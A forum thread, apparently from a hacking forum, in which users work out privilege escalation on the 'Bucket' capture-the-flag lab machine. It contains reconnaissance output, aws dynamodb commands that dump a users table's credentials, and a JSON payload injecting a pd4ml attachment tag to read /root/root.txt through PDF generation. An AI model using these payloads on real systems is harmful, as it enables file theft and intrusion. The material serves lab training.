TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#37
Any ideas for privesc root?
i know there is a docker and i think something needs to be done with him, but roy is not a member of the docker group so i don't think we can exploit GTFOBins in this case
Reply
#38
(October 18, 2020 at 05:33 PM)Kali76 Wrote: Any ideas for privesc root?
i know there is a docker and i think something needs to be done with him, but roy is not a member of the docker group so i don't think we can exploit GTFOBins in this case

i'm stuck too. there is suspicous process running.. maybe we should look
Reply
#39
any thoughts on privesc? enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home
Reply
#40
(October 18, 2020 at 06:24 PM)southerndarkness Wrote: any thoughts on privesc? enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home

It probably has to do with /var/www/bucket-app, look at the code into index.php...

I forwarded 127.0.0.1:8000 with ssh, and got a response from that application...

Also tried POSTing "action=get_alerts" to that page and got an empty response...

Have to think a little more about it...
Reply
#41
(October 18, 2020 at 06:42 PM)raidmail2020 Wrote:
(October 18, 2020 at 06:24 PM)southerndarkness Wrote: any thoughts on privesc? enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home

It probably has to do with /var/www/bucket-app, look at the code into index.php...

I forwarded 127.0.0.1:8000 with ssh, and got a response from that application...

Also tried POSTing "action=get_alerts" to that page and got an empty response...

Have to think a little more about it...

Ahhh port forwarded now and checking out the bucket application site. 👀

It seems if we post to ?actions we connect to db on 4566 and dump items from alerts table into a pdf? strange
Reply
#42
http://127.0.0.1:8000/server-status/

`

Apache Server Status for 127.0.0.1 (via 127.0.0.1)

Server Version: Apache/2.4.41 (Ubuntu) mpm-itk/2.4.7-04
Server MPM: prefork
Server Built: 2020-08-12T19:46:17

Current Time: Sunday, 18-Oct-2020 18:07:35 UTC
Restart Time: Sunday, 18-Oct-2020 17:29:57 UTC
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 37 minutes 37 seconds
Server load: 6.40 3.16 1.29
Total accesses: 27670 - Total Traffic: 16.6 MB - Total Duration: 5587651
CPU Usage: u.16 s.42 cu3.82 cs7.12 - .51% CPU load
12.3 requests/sec - 7.5 kB/second - 630 B/request - 201.939 ms/request
118 requests currently being processed, 18 idle workers

KR_WWWWWKWWWWWWWWWW__WWWWWWWWWWWWWWWWWWWWWWWWWRWWWWWWWWWWWWWWWK_
_WKWWWWWWWWW_WWWWWWWKWWWWWW_WWRWWWWWWWWWKWWWWWWW_RR_RK__R_KK_CK_
__KK__KK..............

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv PID Acc M CPU SS Req Dur Conn Child Slot Client Protocol VHost Request
0-0 959 1/183/183 K 0.00 0 1 459896 0.5 0.18 0.18 10.10.14.30 http/1.1 127.0.1.1:80 GET /Terms.txt HTTP/1.1
1-0 960 0/558/558 R 0.00 0 0 326548 0.0 0.34 0.34 127.0.0.1 http/1.1 localhost:8000 GET /zimbra/ HTTP/1.1
2-0 961 0/555/555 _ 0.00 0 15960 327726 0.0 0.41 0.41 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/3 HTTP/1.1
3-0 962 0/651/651 W 0.06 3 0 297917 0.0 0.45 0.45 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/aboutus HTTP/1.1
4-0 963 1/602/602 W 0.00 15 0 292803 1.0 0.39 0.39 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/category HTTP/1.1
5-0 3080 1/595/595 W 0.00 15 0 281609 1.0 0.43 0.43 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/15 HTTP/1.1
6-0 5180 1/569/569 W 0.00 15 0 308057 1.0 0.40 0.40 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/media HTTP/1.1
7-0 21668 0/52/582 W 0.00 2 0 297598 0.0 0.03 0.35 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/people HTTP/1.1
8-0 5650 10/704/704 K 0.00 0 0 298639 5.2 0.46 0.46 10.10.14.30 http/1.1 127.0.1.1:80 GET /car.cnf HTTP/1.1
9-0 6209 1/526/526 W 0.00 15 0 295213 1.0 0.32 0.32 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/4 HTTP/1.1
10-0 6281 0/320/320 W 0.00 12 0 152702 0.0 0.18 0.18 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/24 HTTP/1.1
11-0 14022 1/555/618 W 0.00 14 0 23450 1.0 0.37 0.40 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/services HTTP/1.1
12-0 14684 0/653/832 W 0.00 2 0 3337 0.0 0.38 0.47 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/feedback HTTP/1.1
13-0 21096 1/26/655 W 0.00 13 0 24909 1.0 0.01 0.33 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/2004 HTTP/1.1
14-0 6360 0/697/697 W 0.01 12 0 8641 0.0 0.38 0.38 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/page HTTP/1.1
15-0 21688 0/27/563 W 0.14 5 0 22418 0.0 0.01 0.29 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/projects HTTP/1.1
16-0 11368 1/258/258 W 0.00 14 0 163704 1.0 0.15 0.15 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/resources HTTP/1.1
17-0 19985 4/94/557 W 0.00 15 0 16860 3.8 0.05 0.28 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/14 HTTP/1.1
18-0 11430 1/257/257 W 0.00 15 0 160583 1.0 0.15 0.15 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/press HTTP/1.1
19-0 11483 0/856/856 _ 0.00 0 0 5816 0.0 0.48 0.48 10.10.14.30 http/1.1 127.0.1.1:80 GET /voyeur HTTP/1.1
20-0 11484 0/695/695 _ 0.00 0 0 47312 0.0 0.40 0.40 10.10.14.30 http/1.1 127.0.1.1:80 GET /foundation.cnf HTTP/1.1
21-0 15759 0/339/360 W 0.00 0 0 48533 0.0 0.19 0.20 127.0.0.1 http/1.1 localhost:8000 GET /server-status/ HTTP/1.1
22-0 23071 0/6/740 W 0.00 3 0 23748 0.0 0.00 0.44 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/logos HTTP/1.1
23-0 20466 1/87/250 W 0.00 14 0 19404 1.0 0.04 0.16 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/icons HTTP/1.1
24-0 11562 0/312/312 W 0.00 3 0 164969 0.0 0.17 0.17 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/ads HTTP/1.1
25-0 16280 0/431/704 W 0.00 5 0 21955 0.0 0.24 0.38 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/0 HTTP/1.1
26-0 15827 0/489/552 W 0.00 5 0 22776 0.0 0.36 0.39 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/tools HTTP/1.1
27-0 21689 0/26/457 W 0.00 6 0 20808 0.0 0.01 0.28 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/29 HTTP/1.1
28-0 20646 0/208/810 W 0.00 2 0 5297 0.0 0.13 0.46 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/pub HTTP/1.1
29-0 11573 0/287/287 W 0.00 4 0 175433 0.0 0.16 0.16 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/themes HTTP/1.1
30-0 17131 1/350/572 W 0.00 13 0 18678 1.0 0.23 0.34 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/16 HTTP/1.1
31-0 17232 1/294/327 W 0.00 15 0 16016 1.0 0.17 0.19 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/templates HTTP/1.1
32-0 21735 0/9/687 W 0.00 4 0 28970 0.0 0.01 0.40 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/8 HTTP/1.1
33-0 17233 1/316/363 W 0.00 15 0 15694 1.0 0.18 0.21 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/main HTTP/1.1
34-0 11691 1/634/634 W 0.00 13 0 19971 1.0 0.35 0.35 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/profile HTTP/1.1
35-0 22952 0/16/251 W 0.00 3 0 171412 0.0 0.01 0.14 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/buttons HTTP/1.1
36-0 11695 1/186/186 W 0.00 13 0 175736 1.0 0.11 0.11 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/info HTTP/1.1
37-0 11696 0/661/661 W 0.00 2 0 25954 0.0 0.41 0.41 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/common HTTP/1.1
38-0 11697 0/724/724 W 0.00 12 0 2660 0.0 0.39 0.39 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/5 HTTP/1.1
39-0 17611 0/385/416 W 0.01 12 0 1308 0.0 0.24 0.26 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/9 HTTP/1.1
40-0 11699 0/362/362 W 0.00 5 0 145951 0.0 0.22 0.22 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/28 HTTP/1.1
41-0 17799 0/354/374 W 0.00 12 0 818 0.0 0.23 0.24 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/contactus HTTP/1.1
42-0 11702 0/776/776 W 0.08 4 0 3985 0.0 0.47 0.47 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/linux HTTP/1.1
43-0 11703 1/687/687 W 0.00 15 0 16175 1.0 0.37 0.37 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/content HTTP/1.1
44-0 11704 0/240/240 W 0.00 5 0 169143 0.0 0.14 0.14 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/feed HTTP/1.1
45-0 17906 0/391/625 W 0.00 6 0 2498 0.0 0.25 0.37 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/xml HTTP/1.1
46-0 11706 0/705/705 R 0.00 0 15378 47123 0.0 0.41 0.41 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/13 HTTP/1.1
47-0 17912 0/303/303 W 0.00 5 0 22503 0.0 0.18 0.18 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/7 HTTP/1.1
48-0 21344 0/105/105 W 0.01 12 0 126 0.0 0.08 0.08 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/20 HTTP/1.1
49-0 21736 0/12/12 W 0.00 4 0 26381 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/video HTTP/1.1
50-0 21738 0/1/1 W 0.00 4 0 26685 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/business HTTP/1.1
51-0 21739 0/9/9 W 0.00 4 0 24822 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/forums HTTP/1.1
52-0 21794 0/1/1 W 0.00 2 0 29714 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/sports HTTP/1.1
53-0 21795 0/4/4 W 0.00 2 0 29258 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/comments HTTP/1.1
54-0 21796 0/1/1 W 0.00 2 0 30169 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/uploads HTTP/1.1
55-0 21797 0/28/28 W 0.00 2 0 47 0.0 0.02 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/games HTTP/1.1
56-0 21798 0/1/1 W 0.00 3 0 29035 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/pdf HTTP/1.1
57-0 21799 0/4/4 W 0.00 3 0 28468 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/research HTTP/1.1
58-0 21800 0/1/1 W 0.00 2 0 29468 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/site HTTP/1.1
59-0 21801 0/3/3 W 0.00 3 0 28825 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/print HTTP/1.1
60-0 21862 0/45/45 W 0.00 3 0 171 0.0 0.02 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/email HTTP/1.1
61-0 21863 0/20/20 W 0.00 12 0 543 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/17 HTTP/1.1
62-0 21864 7/15/15 K 0.00 0 0 30351 3.6 0.01 0.01 10.10.14.30 http/1.1 127.0.1.1:80 GET /header2.txt HTTP/1.1
63-0 21865 0/10/10 _ 0.00 0 0 30351 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /yaml_cron.log HTTP/1.1
64-0 21867 0/10/10 _ 0.00 0 0 30350 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /zimbra HTTP/1.1
65-0 21869 0/18/18 W 0.00 12 0 42 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/misc HTTP/1.1
66-0 21871 6/131/131 K 0.00 0 0 598 3.1 0.09 0.09 10.10.14.30 http/1.1 127.0.1.1:80 GET /345.bak HTTP/1.1
67-0 21873 0/22/22 W 0.00 12 0 289 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/19 HTTP/1.1
68-0 21874 0/82/82 W 0.00 2 0 248 0.0 0.04 0.04 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/image HTTP/1.1
69-0 21875 0/15/15 W 0.00 12 0 25 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/6 HTTP/1.1
70-0 21876 0/20/20 W 0.00 12 0 59 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/2007 HTTP/1.1
71-0 21884 0/21/21 W 0.00 12 0 34 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/files HTTP/1.1
72-0 22566 0/52/71 W 0.00 1 0 352 0.0 0.03 0.04 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/subscribe HTTP/1.1
73-0 21890 1/129/129 K 0.00 0 1 448 0.5 0.09 0.09 10.10.14.30 http/1.1 127.0.1.1:80 GET /consumers HTTP/1.1
74-0 21895 0/91/91 W 0.00 2 0 198 0.0 0.05 0.05 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/product HTTP/1.1
75-0 21896 0/21/21 W 0.00 12 0 54 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/27 HTTP/1.1
76-0 21957 0/125/125 _ 0.00 0 0 388 0.0 0.09 0.09 10.10.14.30 http/1.1 127.0.1.1:80 GET /20061207.html HTTP/1.1
77-0 21958 0/104/104 W 0.01 2 0 264 0.0 0.08 0.08 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/story HTTP/1.1
78-0 21959 0/9/9 W 0.00 12 0 50 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/30 HTTP/1.1
79-0 21963 0/71/71 W 0.00 3 0 140 0.0 0.04 0.04 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/banner HTTP/1.1
80-0 21964 0/10/10 W 0.00 12 0 44 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/22 HTTP/1.1
81-0 21965 0/50/50 W 0.00 5 0 287 0.0 0.03 0.03 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/25 HTTP/1.1
82-0 21967 0/69/69 W 0.00 3 0 365 0.0 0.03 0.03 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/books HTTP/1.1
83-0 21968 0/3/3 W 0.00 12 0 5 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/terms HTTP/1.1
84-0 21969 7/129/129 K 0.00 0 0 499 3.6 0.14 0.14 10.10.14.30 http/1.1 127.0.1.1:80 GET /kaspersky.html HTTP/1.1
85-0 21970 0/8/8 W 0.00 12 0 14 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/21 HTTP/1.1
86-0 21971 0/8/8 W 0.00 12 0 52 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/legal HTTP/1.1
87-0 21972 0/68/68 W 0.00 3 0 652 0.0 0.03 0.03 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/graphics HTTP/1.1
88-0 21974 0/0/0 W 0.00 12 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/features HTTP/1.1
89-0 23073 0/0/44 W 0.00 3 0 457 0.0 0.00 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/reviews HTTP/1.1
90-0 21983 0/75/75 W 0.00 2 0 249 0.0 0.04 0.04 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/31 HTTP/1.1
91-0 21984 0/124/124 _ 0.00 0 0 512 0.0 0.09 0.09 10.10.14.30 http/1.1 127.0.1.1:80 GET /competitions.html HTTP/1.1
92-0 21985 0/7/7 W 0.00 12 0 14 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/18 HTTP/1.1
93-0 21987 0/58/58 W 0.00 3 0 546 0.0 0.03 0.03 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/modules HTTP/1.1
94-0 22003 0/121/121 R 0.00 0 0 376 0.0 0.09 0.09 10.10.14.30 http/1.1 127.0.1.1:80 GET /notice.html HTTP/1.1
95-0 22004 0/58/58 W 0.00 2 0 454 0.0 0.03 0.03 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/english HTTP/1.1
96-0 22005 0/3/3 W 0.00 12 0 8 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/docs HTTP/1.1
97-0 22006 0/7/7 W 0.00 12 0 7 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/i HTTP/1.1
98-0 22007 0/4/4 W 0.00 12 0 18 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/html HTTP/1.1
99-0 22008 0/44/44 W 0.00 5 0 545 0.0 0.02 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/user HTTP/1.1
100-0 22009 0/3/3 W 0.00 12 0 21 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/top HTTP/1.1
101-0 22014 0/5/5 W 0.00 12 0 7 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/26 HTTP/1.1
102-0 22022 0/0/0 W 0.00 12 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/partners HTTP/1.1
103-0 22023 0/4/4 W 0.00 12 0 9 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/23 HTTP/1.1
104-0 22024 3/115/115 K 0.00 0 0 484 1.6 0.08 0.08 10.10.14.30 http/1.1 127.0.1.1:80 GET /reader.txt HTTP/1.1
105-0 22284 0/49/49 W 0.00 3 0 74 0.0 0.02 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/view HTTP/1.1
106-0 22026 0/16/16 W 0.00 11 0 11 0.0 0.01 0.01 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/banners HTTP/1.1
107-0 22027 0/47/47 W 0.00 4 0 280 0.0 0.02 0.02 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/jobs HTTP/1.1
108-0 23150 0/0/0 W 0.00 2 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/copyright HTTP/1.1
109-0 23151 0/0/0 W 0.00 2 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/company HTTP/1.1
110-0 23152 0/0/0 W 0.00 2 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/blank HTTP/1.1
111-0 23153 0/0/0 W 0.00 2 0 0 0.0 0.00 0.00 10.10.14.20 http/1.1 s3.bucket.htb:80 GET /adserver/2003 HTTP/1.1
112-0 23205 0/11/11 _ 0.00 0 0 8 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /zehir.php HTTP/1.1
113-0 23207 0/11/11 R 0.00 0 0 16 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /zebra.conf HTTP/1.1
114-0 23208 0/11/11 R 0.00 0 0 100 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /zabbix/ HTTP/1.1
115-0 23210 0/11/11 R 0.00 0 0 20 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /zf_backend.php HTTP/1.1
116-0 23211 0/13/13 R 0.00 0 0 103 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /~admin/ HTTP/1.1
117-0 23216 17/17/17 K 0.00 0 0 22 8.8 0.01 0.01 10.10.14.30 http/1.1 127.0.1.1:80 GET /cnet.bak HTTP/1.1
118-0 23217 0/13/13 _ 0.00 0 0 15 0.0 0.01 0.01 10.10.14.30 http/1.1 127.0.1.1:80 GET /417.bak HTTP/1.1
119-0 23218 0/16/16 _ 0.00 0 0 5 0.0 0.01 0.01 10.10.14.30 http/1.1 127.0.1.1:80 GET /nhl.bak HTTP/1.1
120-0 23296 0/1/1 R 0.00 0 1 3 0.0 0.00 0.00 127.0.0.1 http/1.1 localhost:8000 GET /zeroclipboard.swf HTTP/1.1
121-0 23297 0/2/2 _ 0.00 0 0 5 0.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /advancedsearch.conf HTTP/1.1
122-0 23298 4/4/4 K 0.00 0 0 4 2.1 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /regions HTTP/1.1
123-0 23299 4/4/4 K 0.00 0 0 8 2.1 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /hit.txt HTTP/1.1
124-0 23301 0/2/2 _ 0.00 0 0 4 0.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /installation.bak HTTP/1.1
125-0 23302 4/4/4 C 0.03 0 0 38 2.1 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /prospective.xml HTTP/1.1
126-0 23303 5/5/5 K 0.00 0 0 2 2.6 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /installation.php HTTP/1.1
127-0 23304 0/2/2 _ 0.00 0 0 4 0.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /advancedsearch.xml HTTP/1.1
128-0 23306 0/3/3 _ 0.00 0 0 19 0.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /reader.html HTTP/1.1
129-0 23308 0/2/2 _ 0.00 0 0 8 0.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /Terms.php HTTP/1.1
130-0 23316 4/4/4 K 0.00 0 0 1 2.1 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /worms.xml HTTP/1.1
131-0 23320 4/4/4 K 0.00 0 0 1 2.1 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /index10 HTTP/1.1
134-0 23326 2/2/2 C 0.00 0 0 3 1.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /notice.bak HTTP/1.1
135-0 23327 2/2/2 K 0.00 0 0 2 1.0 0.00 0.00 10.10.14.30 http/1.1 127.0.1.1:80 GET /620.cnf HTTP/1.1
Srv Child Server number - generation
PID OS process ID
Acc Number of accesses this connection / this child / this slot
M Mode of operation
CPU CPU usage, number of seconds
SS Seconds since beginning of most recent request
Req Milliseconds required to process most recent request
Dur Sum of milliseconds required to process all requests
Conn Kilobytes transferred this connection
Child Megabytes transferred this child
Slot Total megabytes transferred this slot
Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 8000
`

dirsearch -u http://127.0.0.1:8000 -e *
[14:05:48] 200 - 63B - /composer.json
[14:05:48] 200 - 20KB - /composer.lock
[14:05:56] 301 - 313B - /files -> http://127.0.0.1:8000/files/
[14:05:56] 200 - 738B - /files/
[14:06:00] 200 - 16KB - /index.php/login/
[14:06:01] 200 - 16KB - /index.php
[14:06:25] 200 - 31KB - /server-status/
[14:06:25] 200 - 31KB - /server-status
[14:06:34] 200 - 0B - /vendor/autoload.php
[14:06:34] 200 - 0B - /vendor/composer/ClassLoader.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_real.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_static.php
[14:06:34] 200 - 18KB - /vendor/composer/installed.json
[14:06:34] 200 - 0B - /vendor/composer/autoload_files.php
[14:06:34] 200 - 1KB - /vendor/composer/LICENSE
[14:06:34] 200 - 0B - /vendor/composer/autoload_psr4.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_namespaces.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_classmap.php
Reply
#43
We need to trigger POST with :

{
"alerts": [
{
"PutRequest": {
"Item": {
"title": {"S":"Ransomware"} ,
"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
}
}
}
]
}

Something like that I try to make it work.
Reply
#44
[quote="xxxyz" pid='2974742' dateline='1603045537']
We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.
[/quote
I don’t understand, how do you do a make post request? with burb? this parameters where did you get them?
Reply
#45
(October 18, 2020 at 08:47 PM)Kali76 Wrote: [quote="xxxyz" pid='2974742' dateline='1603045537']
We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.
[/quote
I don’t understand, how do you do a make post request? with burb? this parameters where did you get them?


curl -X POST 127.0.0.1:8000 ...
Reply
#46
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
"alerts": [
{
"PutRequest": {
"Item": {
"title": {"S":"Ransomware"} ,
"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
}
}
}
]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(
Reply
#47
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

this will give u those creds

great man thank you. can you explain me the steps to find this command ?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then i was searching to get those table contents and dynamodb has an option scan "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples i used this command since we already know the tables name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" i got it from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but i dont find any credentials

go to http://s3.bucket.htb/shell
you have now someting.
use aws configure command and paste domain name
Reply
#48
Ok but I don't think you have permission to read root.txt
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Luanne Tutorial/Discussion southerndarkness 33 4,222 December 01, 2020 at 09:07 PM
Last Post: tutyfruty
TUTORIAL Cereal.htb discussion (no tutorial) Kali76 24 3,160 December 01, 2020 at 05:29 PM
Last Post: Kali76
FLAG Bucket Commands to root y0ukn0wm3 5 1,505 November 30, 2020 at 03:28 PM
Last Post: y0ukn0wm3

 Users browsing this thread: 1 Guest(s)